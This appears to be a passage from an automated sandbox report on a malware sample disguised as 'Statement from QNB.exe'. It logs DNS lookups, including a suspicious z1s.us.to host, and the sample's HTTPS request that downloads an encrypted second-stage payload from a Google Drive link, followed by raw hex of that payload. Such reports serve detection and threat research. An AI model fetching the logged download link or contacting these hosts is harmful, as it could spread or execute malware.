                                                                                                  Nov 24, 2021 14:17:05.563827038 CET192.168.11.201.1.1.10xb26cStandard query (0)doc-0k-48-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:17:05.851572037 CET192.168.11.201.1.1.10x4f22Standard query (0)docs.google.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Nov 24, 2021 14:16:12.413542986 CET1.1.1.1192.168.11.200x7b9cNo error (0)drive.google.com142.250.185.78A (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:16:13.199888945 CET1.1.1.1192.168.11.200x2dc8No error (0)doc-00-5k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Nov 24, 2021 14:16:13.199888945 CET1.1.1.1192.168.11.200x2dc8No error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:16:15.760210991 CET1.1.1.1192.168.11.200x9504No error (0)z1s.us.to194.85.248.156A (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:17:05.602368116 CET1.1.1.1192.168.11.200xb26cNo error (0)doc-0k-48-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Nov 24, 2021 14:17:05.602368116 CET1.1.1.1192.168.11.200xb26cNo error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)
                                                                                                  Nov 24, 2021 14:17:05.887257099 CET1.1.1.1192.168.11.200x4f22No error (0)docs.google.com172.217.168.14A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • drive.google.com
                                                                                                  • doc-00-5k-docs.googleusercontent.com
                                                                                                  • doc-0k-48-docs.googleusercontent.com
                                                                                                  • docs.google.com

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.11.2049804142.250.185.78443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:16:12 UTC0OUTGET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  2021-11-24 13:16:13 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Wed, 24 Nov 2021 13:16:12 GMT
                                                                                                  Location: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download
                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                  Content-Security-Policy: script-src 'nonce-bAwMJi9ly97AwiOFSrBHxw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Server: GSE
                                                                                                  Set-Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU; expires=Thu, 26-May-2022 13:16:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Accept-Encoding
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  2021-11-24 13:16:13 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 35 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 39 69 6b 61
                                                                                                  Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika
                                                                                                  2021-11-24 13:16:13 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.11.2049805142.250.186.97443C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-24 13:16:13 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: doc-00-5k-docs.googleusercontent.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2021-11-24 13:16:13 UTC2INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: ADPycdtOr5JMPl8GjN7TTFJbTEflH18ONafGocPsDg0eyZqpjTRPFbiKwyDYlJFKDWNWQuGYqUhz5aulB3ab_jsMSl8
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                                  Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Disposition: attachment;filename="waama_RvvwNtEXp180.bin";filename*=UTF-8''waama_RvvwNtEXp180.bin
                                                                                                  Content-Length: 176192
                                                                                                  Date: Wed, 24 Nov 2021 13:16:13 GMT
                                                                                                  Expires: Wed, 24 Nov 2021 13:16:13 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=cdecFw==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Connection: close
                                                                                                  2021-11-24 13:16:13 UTC6INData Raw: a0 cc d0 7b 2b ed 91 27 f3 6f 12 07 92 55 fe 80 c5 3f ba ab f1 5c 08 6a c5 53 dc 6f 75 a4 65 c5 53 55 57 a8 71 5e 6e 61 48 5b 13 8e 8a 61 5e 2a 63 12 4b b4 2c 5c bf 34 c6 3d c9 3f 85 06 50 8d 22 80 28 44 46 d7 e3 dc 4a 98 5e 66 97 08 97 62 b4 61 19 3a 73 07 0a ba 1d 3b 41 79 77 50 f2 fb c1 ef cb 99 73 83 0a 59 d5 93 7c 91 69 4c 46 07 32 0c e1 fe 90 4e 4f 63 e6 1c e1 aa e6 a6 20 f3 7e b5 2d 27 70 3f 3c d1 be ed ee f0 89 37 3a 82 60 bd 2b 70 08 b1 52 c2 5d 2b 9e 12 86 bb 7e f8 6a 87 40 4c 12 d6 85 a9 17 32 5e c6 95 3d 2b d2 5b b8 55 cf e7 5a ab c2 9c 0e 84 1c f2 74 17 1c af b2 a0 0c e1 5f 8a c5 d5 d1 f3 fc e5 3c 29 28 6f 56 f3 a1 aa d3 ce 1d 35 e4 6d 5f ab 63 09 82 70 ba 85 fa 52 06 0a c9 e8 f3 07 fa 02 54 3e 86 33 4a 03 5d 94 85 83 7d b1 68 c4 40 be 73 83
                                                                                                  Data Ascii: {+'oU?\jSoueSUWq^naH[a^*cK,\4=?P"(DFJ^fba:s;AywPsY|iLF2NOc ~-'p?<7:`+pR]+~j@L2^=+[UZt_<)(oV5m_cpRT>3J]}h@s
                                                                                                  2021-11-24 13:16:13 UTC9INData Raw: 7f 19 ea 5b 9e 2d 91 54 bb 2b 6c 2e 75 21 3d d8 a5 20 d2 0e 69 11 c8 d2 e7 0e 6f 59 87 60 a2 a9 a6 a6 1e 7e 1d 8b b1 f3 83 0d 51 c5 da 55 94 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 65 6a 49 dc f1 e1 1e d8 ec ec 70 ab 88 89 23 e3 81 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a a3 fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a c1 28 f5 b1 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 ea 06 a2 01 85 ef 4a 07 f0 24 c5 59 f4 e1 49 c9 11 dd 05 9f 1c 07 be 9d ab 68 46 0e 4a c0 4d 32 7c 78
                                                                                                  Data Ascii: [-T+l.u!= ioY`~QU"6rjejIp#j%Bd]"{x&m_GeM6QR\j@eU'C!Blo*Cj(~}u^Patqw{LM9lnW4Y+.hJ$YIhFJM2|x
                                                                                                  2021-11-24 13:16:13 UTC13INData Raw: 65 67 47 4b fd 04 1c 84 19 93 5b ae ea ee 78 d2 9e b8 1b 9b e3 02 15 91 f1 67 0f e0 5b e5 69 7c 0c 89 29 b7 51 54 8e 9d 06 1e 02 b3 1b 29 68 d9 cc 28 fb 23 00 c5 33 f9 15 b7 6a 17 cd 28 6c b2 27 8c 31 0e b9 26 f6 8b 79 4a d5 0b c6 da 0a 66 5d 9b f1 f7 54 02 34 62 55 22 7c 7f f3 4a d8 5b e9 4a da b8 ba 45 d7 e3 00 4e 98 5e df 68 f7 97 f4 0c 61 19 49 73 07 0a ea 5d 3b 95 86 94 50 43 04 06 ef 45 66 d8 83 61 a6 5a 93 34 6e 1a 4c 63 f8 65 0c e1 01 c5 4e 4f bf af 1c e1 13 6b a6 20 65 41 aa 97 5a 55 8b 35 4c 86 55 3b 43 b4 16 df 15 eb ce 85 ff ae de 5e 4f fa 46 f6 8e 5f d5 35 68 b4 a7 22 d6 98 a4 f0 1b a5 5b 30 5f ab 72 78 64 54 d7 31 d9 83 57 a6 98 8a 0e 50 e3 0d 74 a6 e3 99 53 29 28 93 df 88 b2 a7 51 d2 8b 97 bc 65 5f 2b f0 97 d7 d8 53 a7 49 bb 8d 0e 8e 9f e3
                                                                                                  Data Ascii: egGK[xg[i|)QT)h(#3j(l'1&yJf]T4bU"|J[JEN^haIs];PCEfaZ4nLceNOk eAZU5LU;C^OF_5h"[0_rxdT1WPtS)(Qe_+SI
                                                                                                  2021-11-24 13:16:13 UTC17INData Raw: 45 19 d7 80 26 d0 e8 77 92 18 5d 08 7d 97 82 0e 16 43 64 8c 52 19 d8 2c f5 5a c6 f7 9f 8d b6 7a f2 7f 19 ea 5b 9e 2d 91 54 bb 2b 6c 2e 75 21 3d d8 a5 20 d2 0e 69 71 e2 92 e7 e2 47 19 87 f2 b2 e9 a6 3e 0e 3e 1d 15 a1 b3 83 0d 51 c5 da 55 94 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 65 6a 49 dc f1 e1 1e d8 ec ec 70 ab 88 89 23 e3 81 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 1d eb 12 eb 45 74 5a a3 68 00 a2 10 19 7a ee db 27 d9 97 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a c1 28 f5 b1 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 5a
                                                                                                  Data Ascii: E&w]}CdR,Zz[-T+l.u!= iqG>>QU"6rjejIp#j%Bd]"{x&m_GeM6QEtZhz'@eU'C!Blo*Cj(~}u^Patqw{LM9lnW4Y+.hZ
                                                                                                  2021-11-24 13:16:13 UTC18INData Raw: 06 1c fc da b5 12 a5 75 26 c0 b0 61 08 8e 37 0d aa 76 d3 c5 74 b0 f4 b7 37 2a 35 28 5a 83 e1 8c 1b 2b 84 26 ba 92 16 4a 84 df 32 0e 0f d7 f3 2a 92 79 fe 8c 05 09 fe 49 43 37 51 02 f2 7e 58 6f fc b8 18 45 fc e3 9a 4e b9 5e 2d 68 ee 97 02 0c 6f 19 45 73 06 0a cd 5d 5b 41 7d 77 2a f2 ee c1 9b cb e7 73 b5 0a 34 d5 94 7c c7 69 15 46 2d 32 46 e1 a8 90 1c 4f 3a e6 71 e1 df 56 97 20 b2 70 85 97 72 70 b6 35 4f 9f 71 ef d0 44 2e 6e 8d 09 c2 0b 72 7a db 35 ce 3c 34 be 7b e7 fa 10 91 1e f6 22 5b 32 eb f0 cd 37 25 30 8d d1 6c 78 94 36 d8 31 c0 c9 3f a6 db b8 7b 84 4d f2 20 17 43 66 71 a7 94 6c f9 e3 1a 58 66 9a 1c 68 8f 40 c5 d4 c3 97 7a 26 62 a7 d3 67 a0 0e 74 26 d3 60 18 70 b8 85 a7 52 3b 0a 8b e8 bb 07 ca 02 1b 3e 8a 63 7f 03 33 d8 8a 80 25 4a 93 e8 4f be 3c 83 d0
                                                                                                  Data Ascii: u&a7vt7*5(Z+&J2*yIC7Q~XoEN^-hoEs][A}w*s4|iF-2FO:qV prp5OqD.nrz5<4{"[27%0lx61?{M CfqlXfh@z&bgt&`pR;>c3%JO<
                                                                                                  2021-11-24 13:16:13 UTC19INData Raw: 39 65 28 49 e9 f1 d8 1e ed ec ad 70 9e 88 cd 23 a0 81 59 c6 83 a6 25 42 d8 59 a6 de 49 a8 63 6b df 1e 65 5f 90 74 14 af 9e d4 ac 0d 22 05 95 dd 56 cc b5 87 07 5c b7 78 3a df eb 7d 90 0e b3 a9 6e ef 80 e4 c0 4c 83 f5 d7 73 d0 90 d4 af 3a a7 6a 93 01 ac 9e eb a3 46 e1 ea b8 05 db e2 e4 e6 cb e7 9a 6f 21 bf a2 3c 98 c1 66 87 59 43 6a c1 84 c5 f1 7e 3f 4f 35 e8 ec 5e 54 61 e8 c5 31 77 86 7b 4c 04 ae da 4d 39 34 b0 1a 4e 88 65 75 23 d5 cb 9f 31 de af 6b 2e 08 38 e6 aa 06 5d d1 7a 0f 4a 07 f0 2e c5 59 f4 b1 1a 88 41 94 2b db 50 4b be 9d ab 66 46 0e 4a 85 23 47 11 28 b2 0b 97 ef 5d 4a fd 55 0d e7 d4 92 2e 12 d1 6e e2 5d bc a9 d7 3d 79 34 c1 cf 40 da 0d 16 d1 3f 81 5f cd ec a3 2f 83 f3 88 b2 84 c4 15 dd 39 71 59 53 c2 4a 71 3f 07 ca 17 f7 1b 6d c0 a8 bb 24 2f b6
                                                                                                  Data Ascii: 9e(Ip#Y%BYIcke_t"V\x:}nLs:jFo!<fYCj~?O5^Ta1w{LM94Neu#1k.8]zJ.YA+PKfFJ#G(]JU.n]=y4@?_/9qYSJq?m$/
                                                                                                  2021-11-24 13:16:13 UTC20INData Raw: cb 99 73 83 0a 59 d5 93 6c 37 81 4a ac 49 9f 3f 78 98 5f 5f f8 6f e6 b6 e1 ca 85 35 46 81 11 9b 97 29 70 8b c7 52 32 66 76 da 8b 07 d9 e6 09 64 0b 60 a9 4d 56 dd 58 14 cb 1f e7 d5 02 d8 b3 94 bb 4f fd b5 47 cb 37 f1 30 86 02 e1 14 81 42 e6 31 aa c9 57 c5 a5 dc 3c 84 1c f2 74 74 71 02 62 a7 d7 6c df f2 4d 58 51 dd 11 1c f1 2f c4 a1 9c f2 61 47 3d c3 f9 02 cc 0e 37 26 e3 cc 3a 30 ba e1 c1 12 06 0a c9 ec f3 d7 8c 42 54 3e 86 63 0f 03 5d d8 84 21 a5 3c ee e8 1d 7e 07 81 0c d5 51 11 4b 5c 0b 02 38 94 ef b7 6f 79 be 7f e1 ec 80 a4 9d a3 d6 9c 1c 93 4c 66 ef 79 cc 57 0c eb 27 ac c4 72 f1 73 1d f3 34 39 5a f3 ce 88 69 5c e3 57 a7 ca 19 a2 63 34 8e b2 cd 10 5f 5f 37 5f 31 db 17 55 ae ab 55 39 53 e4 a7 ab 7d 1d ea 25 8a 2b 69 b4 03 bf de 5e 46 11 62 ab 57 89 c5 2b
                                                                                                  Data Ascii: sYl7JI?x__o5F)pR2fvd`MVXOG70B1W<ttqblMXQ/aG=7&:0BT>c]!<~QK\8oyLfyW'rs49Zi\Wc4__7_1UU9S}%+i^FbW+
                                                                                                  2021-11-24 13:16:13 UTC22INData Raw: df fe 63 0a 79 d1 89 db ad b5 01 2b 43 6a c1 86 f1 c5 81 59 f3 74 e8 fd 5e 51 61 f4 b3 1d 03 79 36 28 fb bf fa b1 3b a4 6c 93 1a 88 16 90 17 d7 3c 7f 41 8a a9 2b 1a b0 68 f6 ea 06 a2 01 9d ef 4a 07 f0 24 df 59 f4 e1 49 c9 13 dd 05 9f 1c 06 c6 62 aa 68 32 f1 4f c1 4d 32 7c 78 c0 64 f4 8a 22 39 98 26 0d e7 d4 1e 18 52 d1 f2 d0 65 43 a3 d5 39 7d 9c 4a 7b 43 da f0 f9 d9 3f bd 5f 39 b2 38 2b 3c f7 fb 8d f7 ce ea 35 51 84 1b ec 9d fa 21 13 47 c7 f4 27 e0 8d 34 57 23 3f 2f b6 44 59 1e 33 30 fa 32 c4 8e 17 a2 6d 0c 17 fb 58 47 7b 8e 23 7f 9a 65 af 77 ea 77 eb 27 dc 05 39 62 56 6c b3 48 84 da ab df 2b 2c 53 7d 07 2f 9b 41 b0 33 b3 6d af de 3f 86 d2 60 18 07 5a 63 53 01 e6 b0 7e 17 e2 e8 01 a2 d2 bf e9 0a 04 bc e3 31 a5 42 2b 99 fd 84 0c 16 39 21 3b 2b af fc f8 bc
                                                                                                  Data Ascii: cy+CjYt^Qay6(;l<A+hJ$YIbh2OM2|xd"9&ReC9}J{C?_98+<5Q!G'4W#?/DY302mXG{#eww'9bVlH+,S}/A3m?`ZcS~1B+9!;+
                                                                                                  2021-11-24 13:16:13 UTC23INData Raw: bb 1c 20 16 4d 58 51 9a b3 18 c6 bf b5 d4 f0 97 51 03 13 a7 9d 67 c9 0e b7 26 cb 60 0a 70 ba 85 fa 52 1e 0a c9 e8 f3 07 ea 02 54 3e 86 63 0e 03 5d d8 84 80 09 b5 af e8 00 be 73 83 f3 35 38 69 70 1c 0b ba 04 7b aa b6 90 a9 41 9f e3 ec 80 ab 0e ab d6 db 79 24 00 1a 80 10 89 33 68 99 b7 df b7 72 f1 d8 25 b3 3c 89 21 ed cb 88 6d 58 92 c7 2e 7f 19 a2 63 34 0e be cd 3e 27 01 93 77 74 db 18 95 ab dd 55 f4 43 db 69 eb 7d a5 ba c0 4a 2b 96 64 90 4f de 13 22 e3 6a eb 53 96 5f 53 51 04 62 32 13 ae f5 0c 28 01 50 a8 06 14 8e b5 34 51 28 00 36 d0 a2 1b da e7 dd 04 7d 63 83 f2 dd b6 65 8c 52 19 72 40 81 a5 aa bb 60 87 b1 7a e6 7f 25 c5 0b 61 18 c5 ab af cb 4d 6e 75 2d 3d ec a5 a8 d2 2a 69 11 c8 d2 e7 0e 6f 41 87 60 a2 a9 a6 aa 1e 7e 1d 8b b1 f3 83 0d 51 c5 da 4d 94 f2
                                                                                                  Data Ascii: MXQQg&`pRT>c]s58ip{Ay$3hr%<!mX.c4>'wtUCi}J+dO"jS_SQb2(P4Q(6}ceRr@`z%aMnu-=*ioA`~QM
                                                                                                  2021-11-24 13:16:13 UTC24INData Raw: 1d 67 3d 09 e7 21 1e 18 52 d1 0c 29 e8 bd a9 d7 39 d7 98 d7 70 0d e2 f2 07 f1 c3 83 7c ed b2 18 5e c3 fb 83 43 88 39 d8 39 51 f9 90 33 3d e6 21 57 62 8a e8 23 e4 d1 c0 0c bb 63 2f b6 44 4d be 10 70 e2 36 c4 82 17 96 51 3c 17 fb 59 47 79 8e 23 67 9a 64 d7 88 eb 61 8b d8 d9 05 39 63 56 6c b3 48 84 a2 54 da 2a 2c 52 7d 95 2e 9a 41 b0 3f b3 6d af de 3f 86 d2 60 19 05 5a 96 53 01 e6 b0 6b 6f 1d 68 0f a2 26 be 15 c1 f9 d8 93 ce 9a 42 63 1e 03 04 3c e9 c4 93 03 2b 56 ef 78 b0 08 b8 19 d1 90 02 81 ab a1 47 0f f6 a0 31 69 bb f4 30 29 0c ae f2 e6 ed d1 75 f9 54 bc 9e 94 ac 6d 0c fb 7e ff 6f c6 9c c9 b7 6a 2d 7c 28 0c 83 12 b9 69 d4 3f 26 f6 92 29 bf d4 df 39 0e 0e 83 5d d4 7f 78 ab 8c 34 19 aa c9 74 c2 0d 02 d8 7e 11 67 da fc 44 05 9a 8b 23 4d d8 a2 e9 3c 08 97 62
                                                                                                  Data Ascii: g=!R)9p|^C99Q3=!Wb#c/DMp6Q<YGy#gda9cVlHT*,R}.A?m?`ZSkoh&Bc<+VxG1i0)uTm~oj-|(i?&)9]x4t~gD#M<b
                                                                                                  2021-11-24 13:16:13 UTC26INData Raw: 7e f1 ae 7d 4c 08 a4 35 4c a2 d8 96 a4 b1 97 53 8b ec a2 63 34 8e b6 a5 ef 33 9a 2c dc 75 db 1c 95 1a 5c ab d9 3b 24 32 15 19 ed 45 b7 cb 47 fe 9b 90 2f 21 c0 b3 1c 62 ab 57 37 b0 5d 57 04 2c 30 17 f6 0a 80 86 ae 93 9a 53 eb fb d5 ba 75 b7 7f da 82 f4 06 93 ed 5d 08 7d 97 77 f1 15 43 64 88 3e e6 26 a2 f4 5a c5 f7 9b 8d 36 7a f6 1b e6 1f 5b 8e 2d 91 a1 bb 2b 6c 2e 19 4d c2 f6 f1 df 92 62 09 ee 96 d1 e7 1e 6f 28 d7 9f 9e 84 f2 59 72 2e e2 77 e3 ef f2 0c 6b fd 25 51 94 bc e8 55 91 9e dd 70 bd 01 ac fe 3d 77 f4 9c 6a 25 a7 7c 39 4d 95 bc d8 f0 e1 1e b4 b0 13 74 8f 77 bd 4f c7 7e 9f c6 83 a6 25 2e 9f 9b c3 4e d3 f7 01 7d 78 36 6d 63 d7 63 9a 1e 11 2b ca a8 d5 d0 ae 60 c0 52 eb a9 30 46 5c e1 14 e2 e5 81 6a ae db 47 34 22 89 e4 eb 7f 5c 2c a0 9a 07 52 eb 2f 0d
                                                                                                  Data Ascii: ~}L5LSc43,u\;$2EG/!bW7]W,0Su]}wCd>&Z6z[-+l.Mbo(Yr.wk%QUp=wj%|9MtwO~%.N}x6mcc+`R0F\jG4"\,R/
                                                                                                  2021-11-24 13:16:13 UTC27INData Raw: 1a 7a 63 60 25 2a 2c 53 7d f2 2d 9b 41 b0 53 c7 92 fd da 4b 79 27 1b 7d 42 fa 02 5b 01 c6 b0 24 66 1d 64 11 d3 16 41 11 b5 05 82 ff fe 65 b7 47 e1 02 04 db 66 bd 6c 30 ac ac 2d 64 4d 09 4d 1b d1 90 02 e0 a0 a1 67 0f 07 d0 ce 97 35 f2 38 29 1c be da 0e 1a d1 11 fd d4 e4 94 68 8e 33 0d 97 02 00 97 1b e4 36 b6 6a df 75 28 6c 83 dd f8 ce 79 e2 62 09 93 29 bf d7 df 39 0e 66 a3 5d 78 0f b8 9f 73 34 09 aa 49 89 34 0c 02 d8 12 62 90 88 bc 30 ba 22 98 b9 0b 38 ca 6e 68 d7 97 3c 05 61 15 3a 02 37 f5 be 29 c4 1b 15 47 af 07 fb c1 ef cb 5e 03 fb f5 47 a2 91 89 91 69 4c 46 f2 31 0c e1 fe 94 3a b0 9d 68 1d e1 aa 56 b6 20 73 78 c6 9b 29 3d ef ca 1f df a9 60 c8 bb 16 6e c2 5d 31 0a 00 8f df 35 b0 3c 2a ca 8e b5 fd 54 68 1f a7 d7 2b 32 a4 f0 ab 43 a4 62 18 10 46 87 f2 36
